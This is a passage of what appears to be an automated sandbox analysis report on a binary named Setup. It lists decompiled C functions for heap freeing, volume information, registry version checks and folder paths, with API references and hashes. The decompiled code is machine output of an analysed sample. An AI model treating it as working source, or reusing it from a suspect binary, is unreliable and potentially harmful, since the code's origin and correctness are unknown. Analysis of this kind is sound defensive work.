				GetVolumeInformationW( &_v20, 0, 0,  &_v8, 0, 0, 0, 0); // executed
				return E0044F6C8(_v8, __ebx, _v12 ^ _t42,  &_v8, _t40, __esi);
			}













                                                                                                                                                              0x00483240
                                                                                                                                                              0x00483249
                                                                                                                                                              0x00483250
                                                                                                                                                              0x00483253
                                                                                                                                                              0x00483259
                                                                                                                                                              0x00483262
                                                                                                                                                              0x00483277
                                                                                                                                                              0x00483281
                                                                                                                                                              0x00483287
                                                                                                                                                              0x0048328a
                                                                                                                                                              0x0048329a
                                                                                                                                                              0x004832b1
                                                                                                                                                              0x004832bd
                                                                                                                                                              0x004832d7
                                                                                                                                                              0x004832ed

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 00483277
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048329A
                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004832B1
                                                                                                                                                                • Part of subcall function 0045508B: __wsplitpath_helper.LIBCMT ref: 004550CD
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?), ref: 004832BD
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004832D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashDirectoryInformationPathSystemVolume__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1689572191-0
                                                                                                                                                              • Opcode ID: 2722dadde5231e78c0d286f39f3dd65ddbc6d3ea9816a338ea9d09ee777a4c26
                                                                                                                                                              • Instruction ID: fc4c74856658e11cbbe3bb0a7f27a8096cd90a6f71694732b6bea6d2f2d74394
                                                                                                                                                              • Opcode Fuzzy Hash: 2722dadde5231e78c0d286f39f3dd65ddbc6d3ea9816a338ea9d09ee777a4c26
                                                                                                                                                              • Instruction Fuzzy Hash: BC119871A9030CABD710DBA4DC4AFED7378AF18700F504559B605A61D0EB706608CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044FAFC Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                              			E0044FAFC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x544138);
				_t8 = E00456860(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E004568A5(_t8);
				}
				if( *0x5c41c0 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x5bccc0); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00454477(_t31);
						 *_t10 = E00454435(GetLastError());
					}
					goto L9;
				}
				E00457DFC(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00457E2F(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00457E5F();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0044FB52();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                              0x0044fafc
                                                                                                                                                              0x0044fafe
                                                                                                                                                              0x0044fb03
                                                                                                                                                              0x0044fb08
                                                                                                                                                              0x0044fb0d
                                                                                                                                                              0x0044fb84
                                                                                                                                                              0x0044fb89
                                                                                                                                                              0x0044fb89
                                                                                                                                                              0x0044fb16
                                                                                                                                                              0x0044fb5b
                                                                                                                                                              0x0044fb5c
                                                                                                                                                              0x0044fb5c
                                                                                                                                                              0x0044fb64
                                                                                                                                                              0x0044fb6a
                                                                                                                                                              0x0044fb6c
                                                                                                                                                              0x0044fb6e
                                                                                                                                                              0x0044fb81
                                                                                                                                                              0x0044fb83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044fb6c
                                                                                                                                                              0x0044fb1a
                                                                                                                                                              0x0044fb20
                                                                                                                                                              0x0044fb25
                                                                                                                                                              0x0044fb2b
                                                                                                                                                              0x0044fb30
                                                                                                                                                              0x0044fb32
                                                                                                                                                              0x0044fb33
                                                                                                                                                              0x0044fb34
                                                                                                                                                              0x0044fb3a
                                                                                                                                                              0x0044fb3b
                                                                                                                                                              0x0044fb42
                                                                                                                                                              0x0044fb4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044fb4d
                                                                                                                                                              0x0044fb4d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044fb4d

                                                                                                                                                              APIs
                                                                                                                                                              • __lock.LIBCMT ref: 0044FB1A
                                                                                                                                                                • Part of subcall function 00457DFC: __mtinitlocknum.LIBCMT ref: 00457E12
                                                                                                                                                                • Part of subcall function 00457DFC: __amsg_exit.LIBCMT ref: 00457E1E
                                                                                                                                                                • Part of subcall function 00457DFC: EnterCriticalSection.KERNEL32(?,?,?,004574AB,0000000D,00544470,00000008,00451FA2,?,00000000), ref: 00457E26
                                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 0044FB25
                                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 0044FB34
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,00544138,0000000C,004573F1,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C), ref: 0044FB64
                                                                                                                                                              • GetLastError.KERNEL32(?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17,?,?,?,004574AB,0000000D), ref: 0044FB75
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                                              • Opcode ID: 6c279857df97adcd3416c356afbc1c3f317e37527fb5748225cca4b9199e88d9
                                                                                                                                                              • Instruction ID: f78cea26cd6aa1b3e2274e40fd7ff0d3506b0f84db429095f7dfc35530fda498
                                                                                                                                                              • Opcode Fuzzy Hash: 6c279857df97adcd3416c356afbc1c3f317e37527fb5748225cca4b9199e88d9
                                                                                                                                                              • Instruction Fuzzy Hash: 5F01D431801301EAEB206BB1DC16B5F3B60EF1172AF50412AF80496192CB3CA98CDA5C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004E74E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E004E74E0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, char* _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				signed char _v8;
				signed char _v12;
				signed int _v16;
				char _v540;
				signed int _v544;
				signed char _v548;
				signed char _v552;
				signed char _v556;
				char _v560;
				signed char _v561;
				intOrPtr _v568;
				signed int _v572;
				signed int _t56;
				signed char _t59;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				void* _t89;

				_t86 = __esi;
				_t85 = __edi;
				_t72 = __ebx;
				_t56 =  *0x561244; // 0xddd124f9
				_v16 = _t56 ^ _t87;
				_v568 = __ecx;
				_v12 = 0;
				_v560 = 0;
				_v544 = 0;
				_v552 = 0;
				_v8 = 0;
				_v548 = 0;
				_v556 = 0;
				_v561 = 0;
				_t82 = _a4;
				_t59 = E004E7470(_v568, 0x80000002, _a4, _a8, 0,  &_v540, 0x104); // executed
				_v561 = _t59;
				if((_v561 & 0x000000ff) != 0) {
					_t82 =  &_v540;
					_t66 = E00452330( &_v560,  &_v540, __edi,  &_v540, ".",  &_v560);
					_t89 = _t88 + 0xc;
					_v12 = _t66;
					while(_v12 != 0) {
						_v544 = _v544 + 1;
						_t81 = _v544;
						_v572 = _v544;
						_v572 = _v572 - 1;
						if(_v572 <= 3) {
							switch( *((intOrPtr*)(_v572 * 4 +  &M004E76BC))) {
								case 0:
									_t81 = _v12;
									_push(_v12);
									_t71 = E004520B8();
									_t89 = _t89 + 4;
									_v552 = _t71;
									goto L9;
								case 1:
									__edx = _v12;
									_push(__edx);
									__eax = E004520B8();
									__esp = __esp + 4;
									_v8 = __eax;
									goto L9;
								case 2:
									__eax = _v12;
									_push(_v12);
									__eax = E004520B8();
									__esp = __esp + 4;
									_v548 = __eax;
									goto L9;
								case 3:
									__ecx = _v12;
									_push(__ecx);
									__eax = E004520B8();
									__esp = __esp + 4;
									_v556 = __eax;
									goto L9;
							}
						}
						L9:
						_t82 =  &_v560;
						_t69 = E00452330(_t81,  &_v560, _t85, 0, ".",  &_v560);
						_t89 = _t89 + 0xc;
						_v12 = _t69;
					}
				}
				_t42 =  &_a12; // 0x537d38
				if(_v552 <=  *_t42) {
					_t44 =  &_a12; // 0x537d38
					if(_v552 !=  *_t44) {
						L21:
						_t62 = 0;
					} else {
						_t82 = _v8;
						_t46 =  &_a16; // 0x537c60
						if(_v8 <=  *_t46) {
							_t48 =  &_a16; // 0x537c60
							if(_v8 !=  *_t48) {
								goto L21;
							} else {
								if(_v548 <= _a20) {
									_t82 = _v548;
									if(_v548 != _a20 || _v556 < _a24) {
										goto L21;
									} else {
										_t62 = 1;
									}
								} else {
									_t62 = 1;
								}
							}
						} else {
							_t62 = 1;
						}
					}
				} else {
					_t62 = 1;
				}
				return E0044F6C8(_t62, _t72, _v16 ^ _t87, _t82, _t85, _t86);
			}

























                                                                                                                                                              0x004e74e0
                                                                                                                                                              0x004e74e0
                                                                                                                                                              0x004e74e0
                                                                                                                                                              0x004e74e9
                                                                                                                                                              0x004e74f0
                                                                                                                                                              0x004e74f3
                                                                                                                                                              0x004e74f9
                                                                                                                                                              0x004e7500
                                                                                                                                                              0x004e750a
                                                                                                                                                              0x004e7514
                                                                                                                                                              0x004e751e
                                                                                                                                                              0x004e7525
                                                                                                                                                              0x004e752f
                                                                                                                                                              0x004e7539
                                                                                                                                                              0x004e7552
                                                                                                                                                              0x004e7561
                                                                                                                                                              0x004e7566
                                                                                                                                                              0x004e7575
                                                                                                                                                              0x004e7587
                                                                                                                                                              0x004e758e
                                                                                                                                                              0x004e7593
                                                                                                                                                              0x004e7596
                                                                                                                                                              0x004e7599
                                                                                                                                                              0x004e75ac
                                                                                                                                                              0x004e75b2
                                                                                                                                                              0x004e75b8
                                                                                                                                                              0x004e75c7
                                                                                                                                                              0x004e75d4
                                                                                                                                                              0x004e75dc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e75e3
                                                                                                                                                              0x004e75e6
                                                                                                                                                              0x004e75e7
                                                                                                                                                              0x004e75ec
                                                                                                                                                              0x004e75ef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e75f7
                                                                                                                                                              0x004e75fa
                                                                                                                                                              0x004e75fb
                                                                                                                                                              0x004e7600
                                                                                                                                                              0x004e7603
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e7608
                                                                                                                                                              0x004e760b
                                                                                                                                                              0x004e760c
                                                                                                                                                              0x004e7611
                                                                                                                                                              0x004e7614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e761c
                                                                                                                                                              0x004e761f
                                                                                                                                                              0x004e7620
                                                                                                                                                              0x004e7625
                                                                                                                                                              0x004e7628
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e75dc
                                                                                                                                                              0x004e762e
                                                                                                                                                              0x004e762e
                                                                                                                                                              0x004e763c
                                                                                                                                                              0x004e7641
                                                                                                                                                              0x004e7644
                                                                                                                                                              0x004e7644
                                                                                                                                                              0x004e7599
                                                                                                                                                              0x004e7652
                                                                                                                                                              0x004e7655
                                                                                                                                                              0x004e7663
                                                                                                                                                              0x004e7666
                                                                                                                                                              0x004e76a9
                                                                                                                                                              0x004e76a9
                                                                                                                                                              0x004e7668
                                                                                                                                                              0x004e7668
                                                                                                                                                              0x004e766b
                                                                                                                                                              0x004e766e
                                                                                                                                                              0x004e7679
                                                                                                                                                              0x004e767c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e767e
                                                                                                                                                              0x004e7687
                                                                                                                                                              0x004e768f
                                                                                                                                                              0x004e7698
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7687
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e766e
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e76b8

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004E7470: RegOpenKeyExW.KERNEL32(?,00000104,00000000,00020019,00000104,?,00000104), ref: 004E748C
                                                                                                                                                              • _wcstok_s.LIBCMT ref: 004E758E
                                                                                                                                                              • _wcstok_s.LIBCMT ref: 004E763C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcstok_s$Open
                                                                                                                                                              • String ID: 8}S$`|S8}S
                                                                                                                                                              • API String ID: 3879386483-3606869655
                                                                                                                                                              • Opcode ID: 9728a3ff92e0f71e6a12aea6d5b08f99367a5ec3e5b93e39bb7426e85638d084
                                                                                                                                                              • Instruction ID: a2f9222925fe8830c8f0cba5c2e6d96b03c4d239ebe84c64fdbbe26eb1bda9d0
                                                                                                                                                              • Opcode Fuzzy Hash: 9728a3ff92e0f71e6a12aea6d5b08f99367a5ec3e5b93e39bb7426e85638d084
                                                                                                                                                              • Instruction Fuzzy Hash: 525190B0D04259EBCB20DFA5E889BDEB770AB54325F2041DAE4096B241D738AF85CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00432780 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00432780(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v33;
				char _v40;
				char _v41;
				char _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t66;
				void* _t72;
				void* _t81;
				void* _t95;
				void* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t142;
				void* _t143;
				void* _t147;

				_v56 = __ecx;
				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
				_v12 =  *((intOrPtr*)(_v56 + 4));
				_v5 = 1;
				while(1) {
					_t66 = E004271F0(_v16);
					_t143 = _t142 + 4;
					_t149 =  *_t66;
					if( *_t66 != 0) {
						break;
					}
					_v12 = _v16;
					_t95 = E00436060(_t149, _v16);
					_t96 = E00415110(_a8);
					_t147 = _t143 + 8;
					_v5 = E0041CC50(_v56, _t96, _t95);
					if((_v5 & 0x000000ff) == 0) {
						_t98 = E00441910(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t98;
					} else {
						_t101 = E00415110(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t101;
					}
					_v16 = _v60;
				}
				__eflags = 0;
				if(0 == 0) {
					E00445360( &_v20, _v12);
					__eflags = _v5 & 0x000000ff;
					if(__eflags != 0) {
						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
						if(__eflags == 0) {
							E004339F0( &_v20);
							L13:
							_t72 = E00415110(_a8);
							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
							if(__eflags == 0) {
								_v49 = 0;
								E00445E50(_a4,  &_v20,  &_v49);
								return _a4;
							}
							_v41 = 1;
							_t81 = E00433210(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8); // executed
							E00445E50(_a4, _t81,  &_v41);
							return _a4;
						}
						_v33 = 1;
						E00445E50(_a4, E00433210(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
						return _a4;
					}
					goto L13;
				}
				_v21 = 1;
				E00445E50(_a4, E00433210(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
				return _a4;
			}



























                                                                                                                                                              0x00432786
                                                                                                                                                              0x00432793
                                                                                                                                                              0x0043279c
                                                                                                                                                              0x0043279f
                                                                                                                                                              0x004327a3
                                                                                                                                                              0x004327a7
                                                                                                                                                              0x004327ac
                                                                                                                                                              0x004327b2
                                                                                                                                                              0x004327b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004327b9
                                                                                                                                                              0x004327c0
                                                                                                                                                              0x004327cd
                                                                                                                                                              0x004327d2
                                                                                                                                                              0x004327de
                                                                                                                                                              0x004327e7
                                                                                                                                                              0x00432800
                                                                                                                                                              0x00432805
                                                                                                                                                              0x0043280a
                                                                                                                                                              0x004327e9
                                                                                                                                                              0x004327ed
                                                                                                                                                              0x004327f2
                                                                                                                                                              0x004327f7
                                                                                                                                                              0x004327f7
                                                                                                                                                              0x00432810
                                                                                                                                                              0x00432810
                                                                                                                                                              0x00432815
                                                                                                                                                              0x00432817
                                                                                                                                                              0x00432857
                                                                                                                                                              0x00432860
                                                                                                                                                              0x00432862
                                                                                                                                                              0x0043287e
                                                                                                                                                              0x00432880
                                                                                                                                                              0x004328b6
                                                                                                                                                              0x004328bb
                                                                                                                                                              0x004328bf
                                                                                                                                                              0x004328e5
                                                                                                                                                              0x004328e7
                                                                                                                                                              0x0043291a
                                                                                                                                                              0x00432929
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0043292e
                                                                                                                                                              0x004328e9
                                                                                                                                                              0x00432905
                                                                                                                                                              0x0043290e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00432913
                                                                                                                                                              0x00432882
                                                                                                                                                              0x004328a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004328a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00432864
                                                                                                                                                              0x00432819
                                                                                                                                                              0x0043283e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 83a200561d82b1da2885810ffe1412cd26173f885f1465ae3b1c524424ee90a5
                                                                                                                                                              • Instruction ID: 7f02a2f273940e8c15b7f1e878ab3f7c789518f2149d08669c4bd01c7883c5cd
                                                                                                                                                              • Opcode Fuzzy Hash: 83a200561d82b1da2885810ffe1412cd26173f885f1465ae3b1c524424ee90a5
                                                                                                                                                              • Instruction Fuzzy Hash: 425171B5D04108BFDB08DFD5D891AEF77B9AF48304F10805EF415A7252DB38AA05CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00495D00 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00495D00(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, signed int _a4, intOrPtr _a8, signed char _a12, signed char _a16) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v542;
				short _v544;
				intOrPtr _v548;
				char _v580;
				char _v581;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				intOrPtr _t45;
				intOrPtr _t63;
				intOrPtr _t64;
				signed int _t65;

				_t64 = __esi;
				_t63 = __edi;
				_t45 = __ebx;
				_push(0xffffffff);
				_push(0x508544);
				_push( *[fs:0x0]);
				_t28 =  *0x561244; // 0xddd124f9
				_t29 = _t28 ^ _t65;
				_v20 = _t29;
				_push(_t29);
				 *[fs:0x0] =  &_v16;
				if((_a16 & 0x000000ff) != 0) {
					_a4 = _a4 | 0x00008000;
				}
				_v544 = 0;
				_t33 = E00451D90(_t63,  &_v542, 0, 0x206);
				_t62 = _a4;
				__imp__SHGetFolderPathW(0, _a4, 0, 0,  &_v544); // executed
				_v548 = _t33;
				if(_v548 != 0) {
					E00417A20(_t45, _a8 + 4, _t63, _t64, 0, 0xffffffff);
				} else {
					if((_a12 & 0x000000ff) == 0) {
						_t62 =  &_v544;
						PathRemoveBackslashW( &_v544);
					} else {
						PathAddBackslashW( &_v544);
					}
					E00417910( &_v544, E00434050( &_v581));
					_v8 = 0;
					E004181D0(_a8,  &_v580);
					_v8 = 0xffffffff;
					E004176E0();
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v548, _t45, _v20 ^ _t65, _t62, _t63, _t64);
			}


















                                                                                                                                                              0x00495d00
                                                                                                                                                              0x00495d00
                                                                                                                                                              0x00495d00
                                                                                                                                                              0x00495d03
                                                                                                                                                              0x00495d05
                                                                                                                                                              0x00495d10
                                                                                                                                                              0x00495d17
                                                                                                                                                              0x00495d1c
                                                                                                                                                              0x00495d1e
                                                                                                                                                              0x00495d21
                                                                                                                                                              0x00495d25
                                                                                                                                                              0x00495d31
                                                                                                                                                              0x00495d3c
                                                                                                                                                              0x00495d3c
                                                                                                                                                              0x00495d41
                                                                                                                                                              0x00495d56
                                                                                                                                                              0x00495d69
                                                                                                                                                              0x00495d6f
                                                                                                                                                              0x00495d75
                                                                                                                                                              0x00495d82
                                                                                                                                                              0x00495dfa
                                                                                                                                                              0x00495d84
                                                                                                                                                              0x00495d8a
                                                                                                                                                              0x00495d9b
                                                                                                                                                              0x00495da2
                                                                                                                                                              0x00495d8c
                                                                                                                                                              0x00495d93
                                                                                                                                                              0x00495d93
                                                                                                                                                              0x00495dc1
                                                                                                                                                              0x00495dc6
                                                                                                                                                              0x00495dd7
                                                                                                                                                              0x00495ddc
                                                                                                                                                              0x00495de9
                                                                                                                                                              0x00495de9
                                                                                                                                                              0x00495e08
                                                                                                                                                              0x00495e1d

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 00495D56
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • PathRemoveBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495DA2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path$Backslash$FolderRemove_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3929315810-0
                                                                                                                                                              • Opcode ID: e866c39ffefa058310cac8271a167628e258bf6ff30628d9102148cb515cfeab
                                                                                                                                                              • Instruction ID: 86fe7a635caa72a0efe5caebca3a345e7fb4d4f12f3475407d8bad049a1c2fa8
                                                                                                                                                              • Opcode Fuzzy Hash: e866c39ffefa058310cac8271a167628e258bf6ff30628d9102148cb515cfeab
                                                                                                                                                              • Instruction Fuzzy Hash: 9031BF7094421CABDB14DF60DC59BEEB774FB14310F5082AAF91AA72C1DB78AA44CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004E7470 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
